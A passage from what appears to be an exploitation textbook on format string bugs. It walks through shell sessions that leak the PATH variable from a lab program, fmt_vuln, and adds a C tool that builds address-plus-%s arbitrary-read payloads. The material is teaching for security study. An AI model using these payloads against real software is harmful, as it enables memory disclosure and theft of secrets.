0x353 Reading from Arbitrary Memory Addresses
The %s format parameter can be used to read from arbitrary memory addresses.
Since it's possible to read the data of the original format string, part of the
original format string can be used to supply an address to the %s format
parameter, as shown here:
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
The four bytes of 0x41 show that the fourth format parameter is reading its data from the beginning of the format string itself. If that fourth format parameter is %s instead of %x, the format function treats those four bytes as a pointer and attempts to print the string located at 0x41414141. Since this isn't a valid address, the program crashes with a segmentation fault. But if a valid memory address is placed there instead, the same mechanism reads out whatever string is stored at that address.
reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
Here the getenvaddr program is used to get the address of the environment variable PATH. Since the program name fmt_vuln is two bytes shorter than getenvaddr, four is added to the address (getenvaddr makes this adjustment itself before printing), and the bytes are written in reverse order because of the little-endian byte ordering. The fourth format parameter, %s, reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Since this is the address of the PATH environment variable, the variable is printed just as if a pointer to it had been passed to printf().
Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted from the %x format parameters; those parameters are only needed to step through memory until the address is reached. Using this technique, any memory address can be examined as a string, provided the address itself contains no null byte, since a null byte would terminate the argument string early.
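As an added example (not code from the book or its booksrc directory), the two steps above in C: working out from the probe output which parameter reads the start of the format string, and then building the address-plus-%s payload. It assumes the book's 32-bit little-endian x86 target, where the address is four bytes and the variadic arguments come from the stack; the function names find_offset and build_read_payload and the sample probe output are my own. On x86-64 the first few variadic arguments are passed in registers, so the parameter index the probe finds will differ, but the construction is the same.

```c
/* Added example: helpers for the arbitrary-read format string trick.
 * Assumes the book's 32-bit x86 target (4-byte little-endian addresses
 * read from the stack). find_offset and build_read_payload are my own
 * names, not part of the book's booksrc. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Given the "wrong way" output of a probe such as AAAA%08x.%08x.%08x.%08x,
 * return the 1-based index of the %08x field that printed 41414141, i.e.
 * the parameter that reads the start of the format string. 0 = not found. */
int find_offset(const char *probe_output)
{
    const char *p = probe_output;
    int idx = 1;

    if (strncmp(p, "AAAA", 4) != 0)
        return 0;
    p += 4;
    while (*p) {
        if (strncmp(p, "41414141", 8) == 0 && (p[8] == '.' || p[8] == '\0'))
            return idx;
        p = strchr(p, '.');
        if (p == NULL)
            break;
        p++;
        idx++;
    }
    return 0;
}

/* Write <addr, little-endian><offset-1 stepping parameters>%s into out.
 * padded selects "%08x." (the probe form) or the shorter "%x." form, which
 * is enough once the offset is known. Returns the payload length, or 0 if
 * the address contains a NUL byte (it would end the argv string early),
 * the offset is invalid, or out is too small. */
size_t build_read_payload(uint32_t addr, int offset, int padded,
                          char *out, size_t outsz)
{
    const char *step = padded ? "%08x." : "%x.";
    size_t slen = strlen(step), len = 0;

    if (offset < 1 || outsz < 4 + 3)
        return 0;
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(addr >> (8 * i));
        if (b == 0)
            return 0;
        out[len++] = (char)b;          /* least significant byte first */
    }
    for (int i = 1; i < offset; i++) {
        if (len + slen + 3 > outsz)    /* keep room for "%s" and the NUL */
            return 0;
        memcpy(out + len, step, slen);
        len += slen;
    }
    memcpy(out + len, "%s", 3);        /* copies the terminating NUL too */
    return len + 2;
}

/* Usage (address from getenvaddr, offset from find_offset on the probe):
 *   ./fmt_vuln "$(./build_payload 0xbffffdd7 4)"
 * Append "nopad" to emit the shorter %x. stepping parameters instead. */
int main(int argc, char *argv[])
{
    char payload[256];
    /* constructed sample of the probe's "wrong way" output */
    const char *probe = "AAAAbffff3d0.b7fe75fc.00000000.41414141";

    if (argc < 3) {
        fprintf(stderr, "usage: %s <hex address> <offset> [nopad]\n", argv[0]);
        fprintf(stderr, "sample probe %s -> offset %d\n", probe, find_offset(probe));
        return 1;
    }
    uint32_t addr = (uint32_t)strtoul(argv[1], NULL, 16);
    int offset = atoi(argv[2]);
    int padded = (argc < 4 || strcmp(argv[3], "nopad") != 0);
    size_t n = build_read_payload(addr, offset, padded, payload, sizeof payload);
    if (n == 0) {
        fprintf(stderr, "cannot build payload (NUL byte in address or bad offset)\n");
        return 1;
    }
    fwrite(payload, 1, n, stdout);     /* raw bytes, for $(...) substitution */
    return 0;
}
```

The NUL check matters more than it looks: the address is delivered through argv, and any zero byte in it ends the string, so a target such as 0x08049700 cannot be read this way even though the technique is otherwise sound.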